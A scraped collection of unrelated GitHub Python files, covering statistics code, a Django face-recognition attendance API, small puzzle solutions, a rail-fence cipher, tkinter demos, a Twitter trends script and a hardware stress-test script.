np\n\nfrom .._data_obj import cellname\nfrom . import stats\nfrom .contrast import parse\n\n\n# array functions: work on array, take axis argument\nnp_afuncs = {'min': np.min,\n             'max': np.max,\n             'sum': np.sum}\n# binary functions: work on two arrays\nnp_bfuncs = {'subtract': np.subtract,\n             'add': np.add}\n# unary functions: work on a single array\nnp_ufuncs = {'abs': np.abs,\n             'negative': np.negative}\n\n\nclass TContrastSpec:\n    \"Parse a contrast expression and expose methods to apply it\"\n\n    def __init__(self, contrast, cells, indexes):\n        \"\"\"Parse a contrast expression and expose methods to apply it\n\n        Parameters\n        ----------\n        contrast : str\n            Contrast specification.\n        cells : tuple of cells\n            Cells that occur in the contrast (each cell is represented by a str\n            or a tuple of str).\n        indexes : dict {cell: index}\n            Indexes for the data of every cell.\n        \"\"\"\n        ast = parse(contrast)\n        n_buffers, cells_in_contrast = _t_contrast_rel_properties(ast)\n        pcells, mcells = _t_contrast_rel_expand_cells(cells_in_contrast, cells)\n\n        self.contrast = contrast\n        self.indexes = indexes\n        self._ast = ast\n        self._pcells = pcells\n        self._mcells = mcells\n        self._n_buffers = n_buffers\n\n        # data buffers\n        self._buffer_shape = None\n        self._buffer = None\n        self._y_perm = None\n\n    def map(self, y):\n        \"Apply contrast without retaining data buffers\"\n        buff = np.empty((self._n_buffers,) + y.shape[1:])\n        data = _t_contrast_rel_data(y, self.indexes, self._pcells, self._mcells)\n        tmap = _t_contrast_rel(self._ast, data, buff)\n        return tmap\n\n    def __call__(self, y, out, perm):\n        \"Apply contrast to permutation of the data, storing and recycling data buffers\"\n        buffer_shape = (self._n_buffers,) + y.shape[1:]\n        if self._buffer_shape != buffer_shape:\n            self._buffer = np.empty(buffer_shape)\n            self._y_perm = np.empty_like(y)\n            self._buffer_shape = buffer_shape\n        self._y_perm[perm] = y\n        data = _t_contrast_rel_data(self._y_perm, self.indexes, self._pcells, self._mcells)\n        tmap = _t_contrast_rel(self._ast, data, self._buffer, out)\n        return tmap\n\n\ndef _t_contrast_rel_properties(item):\n    \"\"\"Find properties of a compiled t-contrast\n\n    Parameters\n    ----------\n    item : tuple\n        Contrast specification.\n\n    Returns\n    -------\n    n_buffers : int\n        Number of buffer maps needed.\n    cells : set\n        names of all cells that occur in the contrast.\n    \"\"\"\n    if item[0] == 'ufunc':\n        needed_buffers, cells = _t_contrast_rel_properties(item[2])\n        return needed_buffers + 1, cells\n    elif item[0] in ('bfunc', 'afunc'):\n        _, _, items_ = item\n        local_buffers = len(items_)\n        cells = set()\n        for i, item_ in enumerate(items_):\n            available_buffers = local_buffers - i - 1\n            needed_buffers, cells_ = _t_contrast_rel_properties(item_)\n            additional_buffers = needed_buffers - available_buffers\n            if additional_buffers > 0:\n                local_buffers += additional_buffers\n            cells.update(cells_)\n        return local_buffers, cells\n    else:\n        return 0, set(item[1:])\n\n\ndef _t_contrast_rel_expand_cells(cells, all_cells):\n    \"\"\"Find cells that are an average of other cells\n\n    Parameters\n    ----------\n    cells : set\n        Cells occurring in the contrast.\n    all_cells : tuple\n        All cells in the data.\n\n    Returns\n    -------\n    primary_cells : set\n        All cells that occur directly in the data.\n    mean_cells : dict\n        ``{name: components}`` dictionary (components being a tuple with all\n        cells to be averaged).\n    \"\"\"\n    # check all cells have same number of components\n    ns = set(1 if isinstance(cell, str) else len(cell) for cell in all_cells)\n    ns.update(1 if isinstance(cell, str) 
else len(cell) for cell in cells)\n    if len(ns) > 1:\n        msg = (\"Not all cells have the same number of components: %s\" %\n               str(tuple(cells) + tuple(all_cells)))\n        raise ValueError(msg)\n\n    # convert cells to str for fnmatch\n    all_cellnames = tuple(cellname(cell, '|') for cell in all_cells)\n\n    primary_cells = set()\n    mean_cells = {}\n    for cell in cells:\n        if cell in all_cells:\n            primary_cells.add(cell)\n        else:\n            r = re.compile(fnmatch.translate(cellname(cell, '|')))\n            base = tuple(c for c, cn in zip(all_cells, all_cellnames) if r.match(cn))\n            if len(base) == 0:\n                raise ValueError(\"%r does not match any cells in data %r\" %\n                                 (cellname(cell, '|'), ', '.join(all_cellnames)))\n            mean_cells[cell] = base\n            primary_cells.update(base)\n\n    return primary_cells, mean_cells\n\n\ndef _t_contrast_rel_data(y, indexes, cells, mean_cells):\n    \"Create {cell: data} dictionary\"\n    data = {cell: y[indexes[cell]] for cell in cells}\n    for name, cells_ in mean_cells.items():\n        cell = cells_[0]\n        x = data[cell].copy()\n        for cell in cells_[1:]:\n            x += data[cell]\n        x /= len(cells_)\n        data[name] = x\n\n    return data\n\n\ndef _t_contrast_rel(item, data, buff, out=None):\n    \"Execute a t_contrast (recursive)\"\n    if item[0] == 'ufunc':\n        _, func, item_ = item\n        tmap = _t_contrast_rel(item_, data, buff[1:], buff[0])\n        tmap = func(tmap, out)\n    elif item[0] == 'bfunc':\n        _, func, items = item\n        tmap1 = _t_contrast_rel(items[0], data, buff[2:], buff[1])\n        tmap2 = _t_contrast_rel(items[1], data, buff[2:], buff[0])\n        tmap = func(tmap1, tmap2, out)\n    elif item[0] == 'afunc':\n        _, func, items_ = item\n        tmaps = buff[:len(items_)]\n        for i, item_ in enumerate(items_):\n            _t_contrast_rel(item_, data, buff[i + 1:], tmaps[i])\n        tmap = func(tmaps, axis=0, out=out)\n    else:\n        _, c1, c0 = item\n        tmap = stats.t_1samp(data[c1] - data[c0], out)\n\n    return tmap\n","repo_name":"christianbrodbeck/Eelbrain","sub_path":"eelbrain/_stats/t_contrast.py","file_name":"t_contrast.py","file_ext":"py","file_size_in_byte":6249,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"72"} +{"seq_id":"2326628638","text":"import random\n\nt = 100\nprint(t)\nfor _ in range(t):\n    d = []\n    n = random.randint(100, 1000)\n    for i in range(n):\n        d.append(random.randint(4, 1000000))\n    print(n)\n    print(\" \".join([str(i) for i in d]))","repo_name":"lebahoang/cp","sub_path":"gcj/2022/qualification/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41302595372","text":"\n\n\n### a solution from an earlier attempt\n\nN = int(input())\nli_a = list(map(int, input().split(\" \")))\nli_b = list(map(int, input().split(\" \")))\n\nsum = 0\nfor k in range(N) :\n    max, min = 0, 100\n\n    for i in range(len(li_a)) :\n        if li_a[i] > max :\n            max = li_a[i]\n    A = max\n    li_a.remove(max)\n\n    for i in range(len(li_b)) :\n        if li_b[i] < min :\n            min = li_b[i]\n    B = min\n    li_b.remove(min)\n    sum += A*B\n    \nprint(sum)\n","repo_name":"h-dragon93/Algorithm_with_Python","sub_path":"Baekjoon_1026.py","file_name":"Baekjoon_1026.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10227841899","text":"import datetime\nimport json\nfrom django.shortcuts import render\nfrom django.conf import settings\nfrom google.oauth2 import id_token\nfrom google.auth.transport import requests\nfrom rest_framework import views, viewsets, mixins\nfrom rest_framework.parsers 
import FileUploadParser\nfrom core.serializers import *\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom rest_framework.exceptions import ValidationError\nfrom django.core import validators\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.db.models import Q\nfrom rest_framework.decorators import detail_route\n\nimport face_recognition\n\n\n# Create your views here.\nclass GoogleLoginView(views.APIView):\n\n    def post(self, request, format=None):\n        # the Google ID token is assumed to arrive in the POST body under 'token'\n        token = request.data.get('token')\n        try:\n            idinfo = id_token.verify_oauth2_token(token, requests.Request(), settings.CLIENT_ID)\n            if idinfo['iss'] not in ['accounts.google.com', 'https://accounts.google.com']:\n                raise ValueError('Wrong issuer.')\n            userid = idinfo['sub']\n        except ValueError:\n            pass\n\n\nclass UserViewSet(mixins.RetrieveModelMixin,\n                  mixins.UpdateModelMixin,\n                  mixins.CreateModelMixin,\n                  mixins.ListModelMixin,\n                  viewsets.GenericViewSet,):\n    \"\"\"\n    Access the current user: `/users/me/` \\n\n    Get a token: `/auth-token/`, username = `email`, password = `password` \\n\n    Token authentication: `curl -X GET http://127.0.0.1:8000/api/example/ -H 'Authorization: Token 9944b09199c62bcf9418ad846dd0e4bbdfc6ee4b'`\n    \"\"\"\n\n    serializer_class = UserSerializer\n    queryset = User.objects.none()\n\n    def dispatch(self, request, *args, **kwargs):\n        self.perform_authentication(self.initialize_request(request, *args, **kwargs))\n        if kwargs.get('pk') == 'me' and request.user:\n            kwargs['pk'] = request.user.pk\n        return super(UserViewSet, self).dispatch(request, *args, **kwargs)\n\n    def create(self, request, *args, **kwargs):\n        try:\n            validators.validate_email(request.data['email'])\n        except:\n            raise ValidationError({\"email\": _('Enter a valid email address.')})\n        if User.objects.filter(email=request.data['email']).count() > 0:\n            raise ValidationError({\"email\": _('Email is already registered')})\n        if not request.data.get('password', None):\n            raise ValidationError({\"password\": _('Password must be present')})\n        if len(request.data['password']) < 6:\n            raise ValidationError({\"password\": _('Password is too short')})\n        if not request.data.get('first_name', None):\n            raise ValidationError({\"first_name\": _('Name must be present')})\n        user = User.objects.create_user(\n            request.data['username'],\n            request.data['email'],\n            request.data['password'],\n            first_name=request.data.get('first_name',\"\"),\n            last_name=request.data.get('last_name',\"\"),\n            status=request.data.get(\"status\"),\n            photo=request.data.get(\"photo\")\n        )\n        serializer = self.get_serializer(user)\n        return Response(serializer.data, status=status.HTTP_201_CREATED)\n\n    def update(self, request, *args, **kwargs):\n        if kwargs.get('pk') == request.user.pk:\n            user = User.objects.get(pk=request.user.pk)\n            if request.data['status'] not in ('work in office', 'not working'):\n                user.status = request.data['status']\n            user.comment = request.data['comment']\n            user.save()\n            Entry.objects.create(user=user,type=request.data['status']).save()\n            serializer = self.get_serializer(user)\n            return Response(serializer.data, status=status.HTTP_201_CREATED)\n        else:\n            return Response([_('Wrong credentials')], status=status.HTTP_400_BAD_REQUEST)\n\n    def get_queryset(self):\n        q = self.request.GET.get('q')\n        if q:\n            return User.objects.filter(Q(first_name__icontains=q) | Q(last_name__icontains=q))\n        else:\n            return User.objects.all()\n\n    @detail_route(methods=['get'])\n    def entries(self, request, pk=None):\n        user = self.get_object()\n        entries = user.entry_set\n        dt_start = 
request.GET.get('start')\n        if dt_start:\n            entries = entries.filter(datetimestamp__gte=dt_start)\n        dt_end = request.GET.get('end')\n        if dt_end:\n            entries = entries.filter(datetimestamp__lte=dt_end)\n        return Response(EntrySerializer(entries, many=True).data, status=status.HTTP_200_OK)\n    \n\nclass EntryViewSet(viewsets.ModelViewSet):\n    \"\"\"\n    Example:\n\n    `curl -H \"Authorization: Token 512e3026a7c11dc6cc52027a6c1677b012f0dfae\" -H \"Content-Disposition: attachment; filename=андрюха.png\" --data-binary @\"../Downloads/андрюха.png\" https://absolute.cloud.technokratos.com/api/entries/`\n    \"\"\"\n    queryset = Entry.objects.all()\n    serializer_class = EntrySerializer\n    parser_classes = (FileUploadParser,)\n\n    def create(self, request, *args, **kwargs):\n        # request.data._mutable = True\n        request.data['photo'] = request.data['file']\n        today_min = datetime.datetime.combine(datetime.date.today(), datetime.time.min)\n\n        entry = Entry.objects.create(user=None, type=None, photo=request.data['photo'])\n\n        unknown_image = face_recognition.load_image_file(request.data['file'])\n        unknown_encoding = face_recognition.face_encodings(unknown_image)[0]\n\n        for user in User.objects.all():\n            if user.photo:\n                known_image = face_recognition.load_image_file(user.photo)\n                known_encoding = face_recognition.face_encodings(known_image)[0]\n                results = face_recognition.compare_faces([known_encoding], unknown_encoding)\n                print(results)\n                if results[0]:\n                    entry.user = user\n                    print(entry.user)\n                    if not Entry.objects.filter(user=user):\n                        entry.type = 'enter'\n                        user.status = 'work in office'\n                    elif Entry.objects.filter(user=user, type='enter', datetimestamp__gte=today_min):\n                        entry.type = 'exit'\n                        user.status = 'not working'\n                    else:\n                        entry.type = 'enter'\n                        user.status = 'work in office'\n                    entry.save()\n                    user.save()\n                    break\n        return Response(EntrySerializer(entry).data)\n\n\nclass ProjectViewSet(viewsets.ModelViewSet):\n    queryset = Project.objects.all()\n    serializer_class = ProjectSerializer\n","repo_name":"blinovandrey/hackaton_face_recognition","sub_path":"core/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22540262328","text":"from math import factorial\n\nsum = 0\nfor cnt in range(1, 100000):\n    a = list(str(cnt))\n    sum_ = 0\n    for n in a:\n        sum_ += factorial(int(n))\n    if sum_ == cnt:\n        sum += cnt\n\nprint(sum - factorial(2) - factorial(1))\n","repo_name":"melank/ProjectEuler","sub_path":"py/problem34.py","file_name":"problem34.py","file_ext":"py","file_size_in_byte":232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40979558655","text":"import datetime\n\ndef encrypt(text, height):\n    result = \"\"\n    for i in range(height):\n        for j in range(i, len(text), height):\n            result += text[j]\n    return result\n\ndef decrypt(text, height):\n    # rebuild the plaintext by writing the ciphertext back into the positions\n    # that encrypt() read from; this also covers lengths not divisible by height\n    result = [\"\"] * len(text)\n    pos = 0\n    for i in range(height):\n        for j in range(i, len(text), height):\n            result[j] = text[pos]\n            pos += 1\n    return \"\".join(result)\n\ntext = input(\"Enter the text: \")\nheight = int(input(\"Enter the fence height (secret key): \"))\nencrypted_text = encrypt(text, height)\nprint(\"Encrypted text: \", encrypted_text)\ndecrypted_text = decrypt(encrypted_text, height)\nprint(\"Decrypted text: \", decrypted_text)\n\n\ndef printTimeStamp(name):\n    print('Program author: ' + name)\n    print('Compilation time: ' + 
str(datetime.datetime.now()))\n\n\nprintTimeStamp(\"Yan Savinov\")\n","repo_name":"YanSav10/CSBC","sub_path":"practice-7/task-2.py","file_name":"task-2.py","file_ext":"py","file_size_in_byte":992,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19156180635","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.cluster import KMeans\nfrom sklearn.metrics import pairwise_distances_argmin\nfrom sklearn.datasets import load_sample_image\nfrom sklearn.utils import shuffle\n\nfrom PIL import Image\nimg = Image.open(\"C:\\\\Users\\\\Sci_Dell_Cpu\\\\Desktop\\\\aaa.webp\")\nchina = np.asarray(img)\n\nn_clusters = 64\nchina = np.array(china,dtype=np.float64) / china.max()\nw,h,d = original_shape = tuple(china.shape)\nassert d == 3\nimage_array = np.reshape(china,(w*h,d))\n\nkmeans = KMeans(n_clusters=n_clusters,random_state=0).fit(image_array)\n\nlabels = kmeans.predict(image_array)\n\nimage_kmeans = image_array.copy()\nfor i in range(w*h):\n    image_kmeans[i] = kmeans.cluster_centers_[labels[i]]\n\nimport pandas as pd\npd.DataFrame(image_kmeans).drop_duplicates().shape\n\nimage_kmeans = image_kmeans.reshape(w,h,d)\n\ncentroid_random = shuffle(image_array,random_state=0)[:n_clusters]\nlabels_random = pairwise_distances_argmin(centroid_random,image_array,axis=0)\nimage_random = image_array.copy()\nfor i in range(w*h):\n    image_random[i] = centroid_random[labels_random[i]]\nimage_random = image_random.reshape(w,h,d)\n\npic=plt.subplot(2,2,1)\npic.imshow(china)\npic=plt.subplot(2,2,2)\npic.imshow(image_kmeans)\npic=plt.subplot(2,2,3)\npic.imshow(image_random)","repo_name":"GuoJia563/sklearn0","sub_path":"kmeans_VQ_mypic.py","file_name":"kmeans_VQ_mypic.py","file_ext":"py","file_size_in_byte":1277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7540499708","text":"import tkinter as tk\nfrom tkinter import messagebox as mgb\nfrom tkinter.messagebox import *\nfrom tkinter import colorchooser\nfrom tkinter import filedialog\n\n\ndef test_messagebox(master=None):\n    mgb.showinfo(title=\"InfoWindow\", message='What the fuck')\n    mgb.showwarning(\"Spam\", \"Egg Warning\")\n    mgb.showerror(\"Spam\", \"Egg Alert\")\n    # print(\"info\", showinfo(\"Spam\", \"Egg Information\"))\n    # print(\"warning\", showwarning(\"Spam\", \"Egg Warning\"))\n    # print(\"error\", showerror(\"Spam\", \"Egg Alert\"))\n    # print(\"question\", askquestion(\"Spam\", \"Question?\"))\n    # print(\"proceed\", askokcancel(\"Spam\", \"Proceed?\"))\n    # print(\"yes/no\", askyesno(\"Spam\", \"Got it?\"))\n    print(\"yes/no/cancel\", askyesnocancel(\"Spam\", \"Want it?\"))\n    print(\"try again\", askretrycancel(\"Spam\", \"Try again?\"))\n\n\ndef test_filedialog(master=None):\n    def callback():\n        print(\"fileName: \", filedialog.askopenfilename())\n\n    tk.Button(master, text=\"Open file\", command=callback).pack()\n\n\ndef test_colorchooser(master=None):\n    def callback():\n        print(\"color:\", colorchooser.askcolor())\n\n    tk.Button(master, text=\"Choose color\", command=callback).pack()\n\n\nif __name__ == \"__main__\":\n    root = tk.Tk()\n    root.title(\"3 Standard Dialog\")\n    height, width = 300, 300\n    root.geometry(\"%dx%d+%d+%d\" % (width, height,\n                                   (root.winfo_screenwidth() - width) // 2,\n                                   (root.winfo_screenheight() - height) // 2))\n    # test_messagebox(root)\n    # test_colorchooser(root)\n    test_filedialog(root)\n\n    
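# test_filedialog() is the active demo here: its button prints the chosen\n    # path. Swapping in test_messagebox(root) walks the modal alerts, and\n    # test_colorchooser(root) adds a button printing an ((r, g, b), '#rrggbb') tuple\n    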
root.mainloop()\n\n","repo_name":"ZhenZHAO/GUI-Tkinter","sub_path":"20_std_dialog.py","file_name":"20_std_dialog.py","file_ext":"py","file_size_in_byte":1576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2391352730","text":"# Create a function that accepts two parameters, namely;\n# 1. A list of type string\n# 2. A name\n# The function should then check if a word is in that list. (Let the word exist e.g THIKA [Busia, Thika, Nakuru, Nyeri])\n# Return that word in reverse order if found.\n#If the word is not found, append the word and return the list.\n\ncounties = [\"Nairobi\",\"Mombasa\",\"Thika\",\"Nakuru\",\"Turkana\",\"Garissa\",\"Lamu\",\"Nandi\",\"Bungoma\"]\ncounty = \"Bungoma\"\n\ndef checker(a,b):\n if a not in b:\n b.append(a)\n printlist(b)\n return b\n else:\n y = a[::-1]\n print(y)\n return y\n\n\n\ndef printlist(thelist):\n for i in thelist:\n print (i)\nk=0\nwhile k !=1:\n checker(county,counties)\n k = int(input(\"To continue, press 0, To exit press 1:\\t\"))\n#print (checker(county,counties))\n","repo_name":"KOdunga/Python_Introduction","sub_path":"PycharmProjects/untitled1/assign2.py","file_name":"assign2.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14942139437","text":"from sqlalchemy import create_engine, MetaData, Table\r\nimport json\r\nimport pandas as pd\r\n\r\ndb_url = \"postgres://nfhbnzfykqrsgq:481860bcda89b87b1c373f024d84c81b41e5ec7c06e8410866f7605984b5789e@ec2-35-175-155-248.compute-1.amazonaws.com:5432/d4mi4q3a82eu6k\"\r\ntable_name = 'realdata'\r\ndata_column_name = 'datastring'\r\n# boilerplace sqlalchemy setup\r\nengine = create_engine(db_url)\r\nmetadata = MetaData()\r\nmetadata.bind = engine\r\ntable = Table(table_name, metadata, autoload=True)\r\n# make a query and loop through\r\ns = table.select()\r\nrows = s.execute()\r\n\r\ndata = []\r\n#status codes of subjects who completed experiment\r\n#statuses = [3,4,5,7]\r\n# if you have workers you wish to exclude, add them here\r\nexclude = []\r\nfor row in rows:\r\n # only use subjects who completed experiment and aren't excluded\r\n \r\n data.append(row[data_column_name])\r\n\r\n# Now we have all participant datastrings in a list.\r\n# Let's make it a bit easier to work with:\r\n\r\n# parse each participant's datastring as json object\r\n# and take the 'data' sub-object\r\ndata = [json.loads(part)['data'] for part in data]\r\n\r\n# insert uniqueid field into trialdata in case it wasn't added\r\n# in experiment:\r\nfor part in data:\r\n for record in part:\r\n record['trialdata']['uniqueid'] = record['uniqueid']\r\n\r\n# flatten nested list so we just have a list of the trialdata recorded\r\n# each time psiturk.recordTrialData(trialdata) was called.\r\ndata = [record['trialdata'] for part in data for record in part]\r\n\r\n# Put all subjects' trial data into a dataframe object from the\r\n# 'pandas' python library: one option among many for analysis\r\ndata_frame = pd.DataFrame(data)\r\ndata_frame.to_csv('alldataindatabase.csv',index=False)","repo_name":"ShanJG/active_removal_serial_dependence","sub_path":"registered report/task/retrieve.py","file_name":"retrieve.py","file_ext":"py","file_size_in_byte":1694,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"33048171663","text":"import functools\n\n\nclass Participant:\n \n def __init__(self, name, email, exclude):\n self.name = 
name\n self.email = email\n \n if exclude:\n self.exclude = exclude\n else:\n self.exclude = []\n \n self.giftee = None\n\n # The possible giftees. Will be populated in main.py\n self.domain = []\n \n\n @property\n def nameWithMatch(self):\n stringOut = self.name\n if self.giftee:\n stringOut += \" buys for {}\".format(self.giftee.name)\n else:\n stringOut += \" (no match)\"\n return stringOut\n\n '''\n Removes the current object from its own domain\n '''\n def removeSelf(self):\n for i, part in enumerate(self.domain):\n if part == self:\n self.domain.pop(i)\n return\n\n '''\n Updates the domain to exclude objects in the exclude list.\n '''\n def cullDomain(self):\n for i, part in enumerate(self.domain):\n if part in self.exclude:\n self.domain.pop(i)\n\n '''\n Converts the list of names in self.exclude to a list of Participant objects\n '''\n def convertExcludeToObjects(self, participants):\n if not self.exclude:\n pass\n else:\n for i in range(len(self.exclude)):\n nameString = self.exclude[i].strip().lower()\n \n for part in participants:\n objectName = part.name.strip().lower()\n if objectName == nameString:\n self.exclude[i] = part\n break\n\n \n\n\n def __str__(self):\n returnString = \"Name: {}\\nemail: {}\\nExclude:\\n\".format(self.name, self.email)\n if len(self.exclude) == 0:\n returnString += \"\\tNone\"\n elif self.exclude:\n for item in self.exclude:\n if isinstance(item, str):\n returnString += \"\\t\" + item + \"\\n\"\n else:\n returnString += \"\\t\" + item.name + \"\\n\"\n else:\n returnString += \"None\\n\"\n return returnString\n\n\n '''\n The following methods allow objects to be sorted by the number of exceptions.\n '''\n def __lt__(self, other):\n return len(self.exclude) < len(other.exclude)\n\n def __gt__(self, other):\n return len(self.exclude) > len(other.exclude)\n \n def __eq__(self, other):\n return len(self.exclude) == len(other.exclude)\n\n def __ne__(self, other):\n return not self.__eq__(other)\n \n def __le__(self, other):\n return self.__eq__(other) or self.__lt__(other)\n \n def __ge__(self, other):\n return self.__eq__(other) or self.__gt__(other)\n","repo_name":"enanram/SecretSanta","sub_path":"participant.py","file_name":"participant.py","file_ext":"py","file_size_in_byte":2762,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18226220650","text":"# Print welcome message.\nprint(\"Welcome to the tip calculator!\")\n# Request bill data.\ntotal_bill = float(input(\"What was the total bill? $\"))\npercent_tip = int(input(\"How much tip would you like to give? 10, 12, or 15?\"))\npeople = int(input(\"How many people to split the bill? 
\"))\n# Calculate tip and total bill\ntip = (percent_tip + 100) / 100\nnew_bill = total_bill * tip\n# Split bill per person\nunit_bill = new_bill / people\n# Round the result to 2 decimal places.\nnew_unit_bill = round(unit_bill, 2)\n# Print result\nprint(f\"Each person should pay: ${new_unit_bill}\")\n","repo_name":"Manuel-7tin/Python-course-projects","sub_path":"2_tip-calculator/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16221180814","text":"import json\nimport tweepy\nfrom tweepy import OAuthHandler\n\n\n\nCONSUMER_KEY = secrets[\"CONSUMER_KEY\"]\nCONSUMER_SECRET = secrets[\"CONSUMER_SECRET\"]\nOAUTH_TOKEN = secrets[\"OAUTH_TOKEN\"]\nOAUTH_TOKEN_SECRET = secrets[\"OAUTH_TOKEN_SECRET\"]\n\nauth = OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)\nauth.set_access_token(OAUTH_TOKEN, OAUTH_TOKEN_SECRET)\n\napi = tweepy.API(auth)\n\nDUB_WOE_ID = 560743\nLON_WOE_ID = 44418\nCHICAGO_ID = 2379574\n\n# http://docs.tweepy.org/en/latest/api.html?highlight=trends_place#API.trends_place\ndub_trends = api.trends_place(DUB_WOE_ID)\nlon_trends = api.trends_place(LON_WOE_ID)\nchi_trends = api.trends_place(CHICAGO_ID)\n\n# for trend in json.dumps(dub_trends)[0]['trends']:\n# print(trend)\n\n# print json.dumps(dub_trends, indent=1)\n# print json.dumps(lon_trends, indent=1)\n# print json.dumps(chi_trends, indent=1)\n\ndub_trends_set = set([trend['name']\n for trend in dub_trends[0]['trends']])\n\nlon_trends_set = set([trend['name']\n for trend in lon_trends[0]['trends']])\n\nchi_trends_set = set([trend['name']\n for trend in chi_trends[0]['trends']])\n\ncommon_trends = set.intersection(dub_trends_set, chi_trends_set)\n\nprint(common_trends)\n","repo_name":"QsBBQ/mytweet","sub_path":"twitter_intro.py","file_name":"twitter_intro.py","file_ext":"py","file_size_in_byte":1204,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27698617180","text":"#!/usr/bin/python3\n\nimport os\nimport time\nimport subprocess\nfrom decimal import Decimal\nfrom multiprocessing import Process\n\ntop_dir = os.path.dirname(os.path.abspath(__file__))\n\n# 0xFFA50800\tPS System Monitor\n# 0xFFA50C00\tPL System Monitor\n# subprocess.run(\"ls -al\", shell=True)\n\ndef get_temperature(address):\n datafile = os.popen(\"devmem %s\" % address)\n rawdata = int(datafile.readline().strip(),16)\n result = \"%.2f\" %(Decimal(rawdata) * Decimal(509.3140064) / Decimal(65535) - Decimal(280.23087870))\n return result\n\ndef get_cpustatus():\n datafile = os.popen(\"top -b -n 1 | grep 'Cpu(s):'\")\n result = datafile.readline().strip()\n return result\n\ndef get_time():\n datafile = os.popen(\"date +%F' '%T' '%z\")\n result = datafile.readline().strip()\n return result\n\ndef get_log():\n result = \"%s %s PS temperature: %s C. 
PL temperature: %s C.\" %(get_time(),get_cpustatus(),get_temperature(address = \"0xFFA50800\"),get_temperature(address = \"0xFFA50C00\"))\n return result\n\ndef function_log(logfile, during):\n while True:\n print(\"==== Process log <%s> is running ====\" %os.getpid())\n writefile = open(\"%s/%s\"%(top_dir,logfile),\"a\")\n logdata = \"%s\" %get_log()\n print(logdata)\n writefile.write(\"%s\\n\" %logdata)\n writefile.close()\n time.sleep(during)\n\ndef function_build(builddir):\n while True:\n print(\"==== Process build <%s> is running ====\" %os.getpid())\n build_dir = \"%s/%s\" %(top_dir,builddir)\n subprocess.run(\"mkdir -p %s\" %build_dir, shell=True )\n os.chdir(\"%s\" %build_dir)\n subprocess.run(\"rm -rf *\" , shell=True)\n subprocess.run(\"cmake /home/root/workspace/PaddleLiteSample/classification\" , shell=True)\n subprocess.run(\"make\", shell=True )\n os.chdir(\"%s\" %top_dir)\n\ndef function_ai(builddir):\n print(\"==== Process AI <%s> is running ====\" %os.getpid())\n build_dir = \"/home/root/workspace/PaddleLiteSample/classification/%s\" %builddir\n subprocess.run(\"mkdir -p %s\" %build_dir, shell=True )\n os.chdir(\"%s\" %build_dir)\n subprocess.run(\"rm -rf *\" , shell=True)\n subprocess.run(\"cmake /home/root/workspace/PaddleLiteSample/classification\" , shell=True)\n subprocess.run(\"make\", shell=True )\n while True:\n print(\"==== Process AI <%s> is running ====\" %os.getpid())\n subprocess.run(\"./image_classify ../configs/resnet50/drink.json\" , shell=True)\n os.chdir(\"%s\" %top_dir)\n\ndef program_stress_test(idle_time, stress_time, idle2_time, logfile, during, processes, builddir):\n file_log = \"%s/%s\"%(top_dir,logfile)\n writefile = open(\"%s\"%file_log,\"a\")\n writefile.write(\"==============================================================================================================================================================\\n\")\n writefile.write(\"idle: %s S. stree: %s S. idle2: %s S. logfile: %s/%s. 
processes: %s.\\n\" %(idle_time, stress_time, idle2_time, top_dir, logfile, processes))\n writefile.write(\"==============================================================================================================================================================\\n\")\n writefile.close()\n process_log = Process(target = function_log, args =(logfile, during, ), name = \"worker_log\" )\n process_log.start()\n time.sleep(idle_time)\n record = []\n for i in range(processes):\n if ( i == 0 ):\n process_work = Process(target = function_ai, args =(\"build\",), name = \"worker_ai\" )\n else:\n process_work = Process(target = function_build, args =(\"%s_%s\"%(builddir,i),), name = \"worker_%s\"%i )\n process_work.start()\n record.append(process_work)\n time.sleep(stress_time)\n for process_work in record:\n process_work.terminate()\n for process_work in record:\n process_work.join()\n time.sleep(idle2_time)\n process_log.terminate()\n process_log.join()\n for i in range(processes):\n subprocess.run(\"rm -rf %s/%s_%s \" %(top_dir,builddir,i ) , shell=True)\n record.clear()\n \nif __name__ == '__main__':\n program_stress_test(idle_time = 1800, stress_time= 3600, idle2_time = 1800, logfile = \"stress.log\", during = 5, processes = 6, builddir = \"worker\")\n\n\n\n\n","repo_name":"robe-zhang/edgeboard_fz5c_stress_test","sub_path":"stress.py","file_name":"stress.py","file_ext":"py","file_size_in_byte":4254,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"35472827554","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\n!+ 去他奶奶的dbghelp.SymXXX(),既然系统是固定的,咱自己解析sym!\n文件格式:\nkernel32.dll.txt:\n 0000AA5C 0000AA8D lstrcmpW\n 00061B7D 00061BAD GetProcessId\n ...\nntdll.dll.txt\n 0006FBD2 0006FBDF _tolower\n ...\n\"\"\"\n\nimport os\nimport inspect\n\n\nfile_path = os.path.abspath(inspect.getsourcefile(lambda: 0))\nfile_dir = os.path.dirname(inspect.getsourcefile(lambda: 